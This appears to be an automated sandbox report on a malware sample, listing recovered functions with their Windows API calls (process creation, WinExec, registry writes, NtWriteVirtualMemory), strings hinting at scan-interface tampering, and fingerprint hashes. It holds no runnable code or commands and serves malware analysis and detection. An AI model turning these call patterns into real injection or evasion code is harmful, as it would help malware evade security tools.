Function 02E7E4B6 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 112
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

InternetCheckConnectionA.WININET(00000000,00000001,00000000), ref: 02E7E5F6

Strings

Initialize, xrefs: 02E7E4E6
OpenSession, xrefs: 02E7E598
ScanBuffer, xrefs: 02E7E53F

Memory Dump Source

Source File: 00000000.00000002.2174887077.0000000002E61000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E60000, based on PE: true

Associated: 00000000.00000002.2174864855.0000000002E60000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2175050035.0000000002E8E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2175408054.0000000002EE7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2175408054.0000000002FDB000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2175408054.0000000002FDE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2e60000_2jbMIxCFsK.jbxd

Similarity

API ID: CheckConnectionInternet
String ID: Initialize$OpenSession$ScanBuffer
API String ID: 3847983778-3852638603
Opcode ID: 137637e05dc9eaaeecb53347488837bbb24959fe2d627409edc0ad9b1900b124
Instruction ID: e42399b162a39f0142706574a37a660c88ccddb7006f70153cf95597d9d5afc1
Opcode Fuzzy Hash: 137637e05dc9eaaeecb53347488837bbb24959fe2d627409edc0ad9b1900b124
Instruction Fuzzy Hash: 14412135BC01099BEB21EBA4D845EEEB3FAEF89740F60E465F041E7291DA70AD018F55

Function 02E78788 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 62processCOMMON

Download Yara Rule

APIs

Part of subcall function 02E781CC: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,02E7823C,?,?,00000000,?,02E77A7E,ntdll,00000000,00000000,02E77AC3,?,?,00000000), ref: 02E7820A
Part of subcall function 02E781CC: GetModuleHandleA.KERNELBASE(?), ref: 02E7821E

Part of subcall function 02E78274: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02E782FC,?,?,00000000,00000000,?,02E78215,00000000,KernelBASE,00000000,00000000,02E7823C), ref: 02E782C1
Part of subcall function 02E78274: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02E782C7
Part of subcall function 02E78274: GetProcAddress.KERNEL32(?,?), ref: 02E782D9

CreateProcessAsUserW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,Kernel32,00000000,00000000,00000000), ref: 02E78814

Strings

CreateProcessAsUserW, xrefs: 02E787A1
Kernel32, xrefs: 02E787D3

Memory Dump Source

Source File: 00000000.00000002.2174887077.0000000002E61000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E60000, based on PE: true

Associated: 00000000.00000002.2174864855.0000000002E60000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2175050035.0000000002E8E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2175408054.0000000002EE7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2175408054.0000000002FDB000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2175408054.0000000002FDE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2e60000_2jbMIxCFsK.jbxd

Similarity

API ID: HandleModule$AddressProc$CreateProcessUser
String ID: CreateProcessAsUserW$Kernel32
API String ID: 3130163322-2353454454
Opcode ID: ec3d1e85cc845976fc4aabb9747865341fb968514962d9527a67c0b092ef5cfb
Instruction ID: b07a23fb58b07a0ff5327771a3b9ae2bf38aa4b3259aa5cd075ab45971831ae2
Opcode Fuzzy Hash: ec3d1e85cc845976fc4aabb9747865341fb968514962d9527a67c0b092ef5cfb
Instruction Fuzzy Hash: D211E5B26C0248AFEB90EFA9DC45F9A77EDEB1D740F91A410FA08D7640D634ED509B24

Function 02E785BA Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 46processCOMMON

Download Yara Rule

APIs

Part of subcall function 02E781CC: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,02E7823C,?,?,00000000,?,02E77A7E,ntdll,00000000,00000000,02E77AC3,?,?,00000000), ref: 02E7820A
Part of subcall function 02E781CC: GetModuleHandleA.KERNELBASE(?), ref: 02E7821E

Part of subcall function 02E78274: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02E782FC,?,?,00000000,00000000,?,02E78215,00000000,KernelBASE,00000000,00000000,02E7823C), ref: 02E782C1
Part of subcall function 02E78274: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02E782C7
Part of subcall function 02E78274: GetProcAddress.KERNEL32(?,?), ref: 02E782D9

WinExec.KERNEL32(?,?), ref: 02E78624

Strings

WinExec, xrefs: 02E785D5
Kernel32, xrefs: 02E78607

Memory Dump Source

Source File: 00000000.00000002.2174887077.0000000002E61000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E60000, based on PE: true

Associated: 00000000.00000002.2174864855.0000000002E60000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2175050035.0000000002E8E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2175408054.0000000002EE7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2175408054.0000000002FDB000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2175408054.0000000002FDE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2e60000_2jbMIxCFsK.jbxd

Similarity

API ID: HandleModule$AddressProc$Exec
String ID: Kernel32$WinExec
API String ID: 2292790416-3609268280
Opcode ID: e8bcb07740aed0b26dfad5649ebf3d3d3cbf6119036b351f32591ff962e6bb3c
Instruction ID: 9fb6fc1609518db5c49bdaa588f38608f559eb07073c62ccdfefb5b6835fc38f
Opcode Fuzzy Hash: e8bcb07740aed0b26dfad5649ebf3d3d3cbf6119036b351f32591ff962e6bb3c
Instruction Fuzzy Hash: 1B0181706C4244BFEB50EBE5EC0AF6A77EDE719700F90E420F904D6640E630AE10AB24

Function 02E785BC Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 45processCOMMON

Download Yara Rule

APIs

Part of subcall function 02E781CC: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,02E7823C,?,?,00000000,?,02E77A7E,ntdll,00000000,00000000,02E77AC3,?,?,00000000), ref: 02E7820A
Part of subcall function 02E781CC: GetModuleHandleA.KERNELBASE(?), ref: 02E7821E

Part of subcall function 02E78274: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02E782FC,?,?,00000000,00000000,?,02E78215,00000000,KernelBASE,00000000,00000000,02E7823C), ref: 02E782C1
Part of subcall function 02E78274: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02E782C7
Part of subcall function 02E78274: GetProcAddress.KERNEL32(?,?), ref: 02E782D9

WinExec.KERNEL32(?,?), ref: 02E78624

Strings

WinExec, xrefs: 02E785D5
Kernel32, xrefs: 02E78607

Memory Dump Source

Source File: 00000000.00000002.2174887077.0000000002E61000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E60000, based on PE: true

Associated: 00000000.00000002.2174864855.0000000002E60000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2175050035.0000000002E8E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2175408054.0000000002EE7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2175408054.0000000002FDB000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2175408054.0000000002FDE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2e60000_2jbMIxCFsK.jbxd

Similarity

API ID: HandleModule$AddressProc$Exec
String ID: Kernel32$WinExec
API String ID: 2292790416-3609268280
Opcode ID: 431a010676fe7d4d1a3200bcb858aefd3db06cb622fbc1b1739b59af50fa50a6
Instruction ID: 10dc342f9362b60502e5c176199e6f5d0f6ebc4a179f42503afb46146b9a9ab0
Opcode Fuzzy Hash: 431a010676fe7d4d1a3200bcb858aefd3db06cb622fbc1b1739b59af50fa50a6
Instruction Fuzzy Hash: C9F081706C4244BFEB50EBE5EC0AF5A77ADE719700F90E420F904D6640D630AE10AB24

Function 02E75C2C Relevance: 4.6, APIs: 3, Instructions: 105fileCOMMON

Download Yara Rule

APIs

CreateFileA.KERNEL32(00000000,C0000000,00000000,00000000,00000002,00000080,00000000,00000000,02E75D74,?,?,02E73900,00000001), ref: 02E75C88
GetLastError.KERNEL32(00000000,C0000000,00000000,00000000,00000002,00000080,00000000,00000000,02E75D74,?,?,02E73900,00000001), ref: 02E75CB6

Part of subcall function 02E67D5C: CreateFileA.KERNEL32(00000000,00000000,00000000,00000000,00000003,00000080,00000000,?,?,02E73900,02E75CF6,00000000,02E75D74,?,?,02E73900), ref: 02E67DAA

Part of subcall function 02E67F98: GetFullPathNameA.KERNEL32(00000000,00000104,?,?,?,02E73900,02E75D11,00000000,02E75D74,?,?,02E73900,00000001), ref: 02E67FB7

GetLastError.KERNEL32(00000000,02E75D74,?,?,02E73900,00000001), ref: 02E75D1B

Part of subcall function 02E6A778: FormatMessageA.KERNEL32(00003200,00000000,?,00000000,?,00000100,00000000,?,02E6C3D9,00000000,02E6C433), ref: 02E6A797

Memory Dump Source

Source File: 00000000.00000002.2174887077.0000000002E61000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E60000, based on PE: true

Associated: 00000000.00000002.2174864855.0000000002E60000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2175050035.0000000002E8E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2175408054.0000000002EE7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2175408054.0000000002FDB000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2175408054.0000000002FDE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2e60000_2jbMIxCFsK.jbxd

Similarity

API ID: CreateErrorFileLast$FormatFullMessageNamePath
String ID:
API String ID: 503785936-0
Opcode ID: a55ab120749cc91ec680d7ea34536145aaff067cfe6f438a39f48dee97b8a9f1
Instruction ID: bba43dedcfef7243ab449912390bd876c89a031289eda3ac45124309f7fb1e0c
Opcode Fuzzy Hash: a55ab120749cc91ec680d7ea34536145aaff067cfe6f438a39f48dee97b8a9f1
Instruction Fuzzy Hash: 0D318E70EC02059FDB00EBA8C885BFEBBE6AB09704F90D465E904AB380D77559058FA1

Function 02E7F212 Relevance: 4.6, APIs: 3, Instructions: 59registryCOMMON

Download Yara Rule

APIs

RegOpenKeyA.ADVAPI32(?,00000000,02FDBA58), ref: 02E7F258
RegSetValueExA.ADVAPI32(00000894,00000000,00000000,00000001,00000000,0000001C,00000000,02E7F2C3), ref: 02E7F290
RegCloseKey.ADVAPI32(00000894,00000894,00000000,00000000,00000001,00000000,0000001C,00000000,02E7F2C3), ref: 02E7F29B

Memory Dump Source

Source File: 00000000.00000002.2174887077.0000000002E61000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E60000, based on PE: true

Associated: 00000000.00000002.2174864855.0000000002E60000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2175050035.0000000002E8E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2175408054.0000000002EE7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2175408054.0000000002FDB000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2175408054.0000000002FDE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2e60000_2jbMIxCFsK.jbxd

Similarity

API ID: CloseOpenValue
String ID:
API String ID: 779948276-0
Opcode ID: 0df0573721d0dfccf5aec52b742421a468383437c63f9405e0b9cd411c73c116
Instruction ID: a4c672fb7c06053d3d1589ea41ab8468528ea661a1e9f0c4bbbb5edfd7ee08eb
Opcode Fuzzy Hash: 0df0573721d0dfccf5aec52b742421a468383437c63f9405e0b9cd411c73c116
Instruction Fuzzy Hash: CE114F716C4248AFEB11EFA8D885EAD77EDEB09780F41A861B904D7690DB30EE408F54

Function 02E7F214 Relevance: 4.6, APIs: 3, Instructions: 58registryCOMMON

Download Yara Rule

APIs

RegOpenKeyA.ADVAPI32(?,00000000,02FDBA58), ref: 02E7F258
RegSetValueExA.ADVAPI32(00000894,00000000,00000000,00000001,00000000,0000001C,00000000,02E7F2C3), ref: 02E7F290
RegCloseKey.ADVAPI32(00000894,00000894,00000000,00000000,00000001,00000000,0000001C,00000000,02E7F2C3), ref: 02E7F29B

Memory Dump Source

Source File: 00000000.00000002.2174887077.0000000002E61000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E60000, based on PE: true

Associated: 00000000.00000002.2174864855.0000000002E60000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2175050035.0000000002E8E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2175408054.0000000002EE7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2175408054.0000000002FDB000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2175408054.0000000002FDE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2e60000_2jbMIxCFsK.jbxd

Similarity

API ID: CloseOpenValue
String ID:
API String ID: 779948276-0
Opcode ID: bbe2f113fbd2a4606ed88cbfab7c6133bec17aeaec0e2906661b9dd109ce737f
Instruction ID: 44bb5b0c4cf7e415717a6b853b1985909ab492e66e355f24ec3f76c3ff3524b9
Opcode Fuzzy Hash: bbe2f113fbd2a4606ed88cbfab7c6133bec17aeaec0e2906661b9dd109ce737f
Instruction Fuzzy Hash: D01151716C4248AFDB11EFA8D885EAD77EDEB09780F41A861F904D7690DB30EE408F54

Function 02E6E364 Relevance: 4.5, APIs: 3, Instructions: 45COMMON

Download Yara Rule

APIs

VariantClear.OLEAUT32(?), ref: 02E6E373

Memory Dump Source

Source File: 00000000.00000002.2174887077.0000000002E61000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E60000, based on PE: true

Associated: 00000000.00000002.2174864855.0000000002E60000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2175050035.0000000002E8E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2175408054.0000000002EE7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2175408054.0000000002FDB000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2175408054.0000000002FDE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2e60000_2jbMIxCFsK.jbxd

Similarity

API ID: ClearVariant
String ID:
API String ID: 1473721057-0
Opcode ID: 448eabfc1773de6490391a95a067d1b3f0c4843071686f05f6494e2094f6bd2f
Instruction ID: 9dc736b6ab787649cd6ec6b07d4828277abc33789bc2e6b2c00f2ec76e703034
Opcode Fuzzy Hash: 448eabfc1773de6490391a95a067d1b3f0c4843071686f05f6494e2094f6bd2f
Instruction Fuzzy Hash: AFF0A9287D8100C78B20BB398C8CEB9279A9F443C472CF836B4469F2C9DB648C45CB62

Function 02E64D50 Relevance: 4.5, APIs: 3, Instructions: 24memoryCOMMON

Download Yara Rule

APIs

SysFreeString.OLEAUT32(02E7F4A4), ref: 02E64C6E
SysAllocStringLen.OLEAUT32(?,?), ref: 02E64D5B
SysFreeString.OLEAUT32(00000000), ref: 02E64D6D

Memory Dump Source

Source File: 00000000.00000002.2174887077.0000000002E61000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E60000, based on PE: true

Associated: 00000000.00000002.2174864855.0000000002E60000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2175050035.0000000002E8E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2175408054.0000000002EE7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2175408054.0000000002FDB000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2175408054.0000000002FDE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2e60000_2jbMIxCFsK.jbxd

Similarity

API ID: String$Free$Alloc
String ID:
API String ID: 986138563-0
Opcode ID: 3f1784c7bf07cd4297d24ff80a07666f1847e75eafdc0d720cb40ac94caab726
Instruction ID: 59c65f1d32bed6d8ed4b25dbd1bc501958df6d39ba1df8e73eeba99e9fc849de
Opcode Fuzzy Hash: 3f1784c7bf07cd4297d24ff80a07666f1847e75eafdc0d720cb40ac94caab726
Instruction Fuzzy Hash: E4E0ECB82C52055EFA266F219948B76262AAFD27C8B14E499A804CE294D7389440AD78

Function 02E770DC Relevance: 3.8, APIs: 1, Strings: 1, Instructions: 256COMMON

Download Yara Rule

APIs

SysFreeString.OLEAUT32(?), ref: 02E773DA

Strings

H, xrefs: 02E77191

Memory Dump Source

Source File: 00000000.00000002.2174887077.0000000002E61000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E60000, based on PE: true

Associated: 00000000.00000002.2174864855.0000000002E60000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2175050035.0000000002E8E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2175408054.0000000002EE7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2175408054.0000000002FDB000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2175408054.0000000002FDE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2e60000_2jbMIxCFsK.jbxd

Similarity

API ID: FreeString
String ID: H
API String ID: 3341692771-2852464175
Opcode ID: 37785ba504537bc6b1bd0e4d2b68cb0c3548f2df1d49ceaad6bb3ff865d2780b
Instruction ID: 253c87f8686d63f46452cb1150ad7dfaf22346aa344d5f5f316af50eac184cf2
Opcode Fuzzy Hash: 37785ba504537bc6b1bd0e4d2b68cb0c3548f2df1d49ceaad6bb3ff865d2780b
Instruction Fuzzy Hash: 2EB1E274A81608AFDB14CF99D480AADFBF2FF8A314F24D169E855AB364D730A845CF50

Function 02E6E760 Relevance: 3.1, APIs: 2, Instructions: 63COMMON

Download Yara Rule

APIs

VariantCopy.OLEAUT32(00000000,00000000), ref: 02E6E781

Part of subcall function 02E6E364: VariantClear.OLEAUT32(?), ref: 02E6E373

Memory Dump Source

Source File: 00000000.00000002.2174887077.0000000002E61000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E60000, based on PE: true

Associated: 00000000.00000002.2174864855.0000000002E60000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2175050035.0000000002E8E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2175408054.0000000002EE7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2175408054.0000000002FDB000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2175408054.0000000002FDE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2e60000_2jbMIxCFsK.jbxd

Similarity

API ID: Variant$ClearCopy
String ID:
API String ID: 274517740-0
Opcode ID: 0d39c5b8f33b5735318407ed4a0d637f0fb52a679703c0daeb0212005e0835ea
Instruction ID: 04ab7c86f73148506909356a89c735352e60ee10cbfdc9d37f5941b1e14f13c7
Opcode Fuzzy Hash: 0d39c5b8f33b5735318407ed4a0d637f0fb52a679703c0daeb0212005e0835ea
Instruction Fuzzy Hash: 4A11A3287D021087C730AF29C8CCE76379AAF457D071CF426F54A8B285DB30DC41CA61

Function 02E6E3FC Relevance: 1.6, APIs: 1, Instructions: 96COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 02E6E43C

Memory Dump Source

Source File: 00000000.00000002.2174887077.0000000002E61000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E60000, based on PE: true

Associated: 00000000.00000002.2174864855.0000000002E60000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2175050035.0000000002E8E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2175408054.0000000002EE7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2175408054.0000000002FDB000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2175408054.0000000002FDE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2e60000_2jbMIxCFsK.jbxd

Similarity

API ID: InitVariant
String ID:
API String ID: 1927566239-0
Opcode ID: c0fb14d3c0cab1041fc67d6c17d64d8d44b8c8eb9e5db7c22b9824474054c82d
Instruction ID: fed8add58de757acf7ecfa7d36d29f76876070de6950532bd79dada2892e537f
Opcode Fuzzy Hash: c0fb14d3c0cab1041fc67d6c17d64d8d44b8c8eb9e5db7c22b9824474054c82d
Instruction Fuzzy Hash: 913160796C42089BDB10DEB8C88CEBA77A8EB0C284F48A461F905D75C0D734D950CBA1

Function 02E789D0 Relevance: 1.6, APIs: 1, Instructions: 72COMMON

Download Yara Rule

APIs

Part of subcall function 02E781CC: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,02E7823C,?,?,00000000,?,02E77A7E,ntdll,00000000,00000000,02E77AC3,?,?,00000000), ref: 02E7820A
Part of subcall function 02E781CC: GetModuleHandleA.KERNELBASE(?), ref: 02E7821E

Part of subcall function 02E78274: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02E782FC,?,?,00000000,00000000,?,02E78215,00000000,KernelBASE,00000000,00000000,02E7823C), ref: 02E782C1
Part of subcall function 02E78274: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02E782C7
Part of subcall function 02E78274: GetProcAddress.KERNEL32(?,?), ref: 02E782D9

Part of subcall function 02E77D78: NtWriteVirtualMemory.NTDLL(?,?,?,?,?), ref: 02E77DEC

Part of subcall function 02E78338: FlushInstructionCache.KERNEL32(?,?,?,00000000,Kernel32,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,02E783C2), ref: 02E783A4

FreeLibrary.KERNEL32(74B10000,00000000,00000000,00000000,00000000,02EE738C,Function_0000662C,00000004,02EE739C,02EE738C,05F5E103,00000040,02EE73A0,74B10000,00000000,00000000), ref: 02E78AAA

Memory Dump Source

Source File: 00000000.00000002.2174887077.0000000002E61000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E60000, based on PE: true

Associated: 00000000.00000002.2174864855.0000000002E60000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2175050035.0000000002E8E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2175408054.0000000002EE7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2175408054.0000000002FDB000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2175408054.0000000002FDE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2e60000_2jbMIxCFsK.jbxd

Similarity

API ID: HandleModule$AddressProc$CacheFlushFreeInstructionLibraryMemoryVirtualWrite
String ID:
API String ID: 1478290883-0
Opcode ID: d090bef770af2ac62f408f57beef927fcb452146abd87eb1aea7afdfde770f01
Instruction ID: 7cdcf7f1f70324849bf3628404e3f48b9ce14979b7ee14c19ae62f8c182f3f20
Opcode Fuzzy Hash: d090bef770af2ac62f408f57beef927fcb452146abd87eb1aea7afdfde770f01
Instruction Fuzzy Hash: 762124706C0300AFFB90FBB5DC0AB6EB79A9B05B40F50F460B605E76C0DA74A9409B19

Function 02E76D6C Relevance: 1.5, APIs: 1, Instructions: 30COMMON

Download Yara Rule

APIs

CLSIDFromProgID.OLE32(00000000,?,00000000,02E76DB9,?,?,?,00000000), ref: 02E76D99

Part of subcall function 02E64C60: SysFreeString.OLEAUT32(02E7F4A4), ref: 02E64C6E

Memory Dump Source

Source File: 00000000.00000002.2174887077.0000000002E61000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E60000, based on PE: true

Associated: 00000000.00000002.2174864855.0000000002E60000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2175050035.0000000002E8E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2175408054.0000000002EE7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2175408054.0000000002FDB000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2175408054.0000000002FDE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2e60000_2jbMIxCFsK.jbxd

Similarity

API ID: FreeFromProgString
String ID:
API String ID: 4225568880-0
Opcode ID: f59306b0b2a31c188f9dc0d53acbdb95b6803c6a2c399d3d36b84d42e5c79eca
Instruction ID: 53bf0c521094a70b697c3d6b37a79b3b42bbaac58c5afb53454e9fcba83dfdfe
Opcode Fuzzy Hash: f59306b0b2a31c188f9dc0d53acbdb95b6803c6a2c399d3d36b84d42e5c79eca
Instruction Fuzzy Hash: 83E0E5356D06087FE321FB62DC41DAE77AEDB8B784B51A4B1F50093640D9316D008860

Function 02E65868 Relevance: 1.5, APIs: 1, Instructions: 26COMMON

Download Yara Rule

APIs

GetModuleFileNameA.KERNEL32(02E60000,?,00000105), ref: 02E65886

Part of subcall function 02E65ACC: GetModuleFileNameA.KERNEL32(00000000,?,00000105,02E60000,02E8E790), ref: 02E65AE8
Part of subcall function 02E65ACC: RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,02E60000,02E8E790), ref: 02E65B06
Part of subcall function 02E65ACC: RegOpenKeyExA.ADVAPI32(80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,02E60000,02E8E790), ref: 02E65B24
Part of subcall function 02E65ACC: RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000), ref: 02E65B42
Part of subcall function 02E65ACC: RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,?,00000000,02E65BD1,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?), ref: 02E65B8B
Part of subcall function 02E65ACC: RegQueryValueExA.ADVAPI32(?,02E65D38,00000000,00000000,?,?,?,?,00000000,00000000,?,?,00000000,02E65BD1,?,80000001), ref: 02E65BA9
Part of subcall function 02E65ACC: RegCloseKey.ADVAPI32(?,02E65BD8,00000000,?,?,00000000,02E65BD1,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 02E65BCB

Memory Dump Source

Source File: 00000000.00000002.2174887077.0000000002E61000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E60000, based on PE: true

Associated: 00000000.00000002.2174864855.0000000002E60000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2175050035.0000000002E8E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2175408054.0000000002EE7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2175408054.0000000002FDB000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2175408054.0000000002FDE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2e60000_2jbMIxCFsK.jbxd

Similarity

API ID: Open$FileModuleNameQueryValue$Close
String ID:
API String ID: 2796650324-0
Opcode ID: 450f0b7c147cec959141904987b0b6e2a54cef4eccdf5940c5d91eecae94a061
Instruction ID: ad9452202b05527134687230de0a7e05b58119da9464cca79ab25a154086efaf
Opcode Fuzzy Hash: 450f0b7c147cec959141904987b0b6e2a54cef4eccdf5940c5d91eecae94a061
Instruction Fuzzy Hash: DBE06D71A803148FCB10DE98C8C4B6633D8AB08794F449961EC58CF346D7B1DD108BE0

Function 02E67DE0 Relevance: 1.5, APIs: 1, Instructions: 23fileCOMMON

Download Yara Rule

APIs

WriteFile.KERNEL32(?,?,?,?,00000000), ref: 02E67DF4

Memory Dump Source

Source File: 00000000.00000002.2174887077.0000000002E61000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E60000, based on PE: true

Associated: 00000000.00000002.2174864855.0000000002E60000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2175050035.0000000002E8E000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2175408054.0000000002EE7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2175408054.0000000002FDB000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2175408054.0000000002FDE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

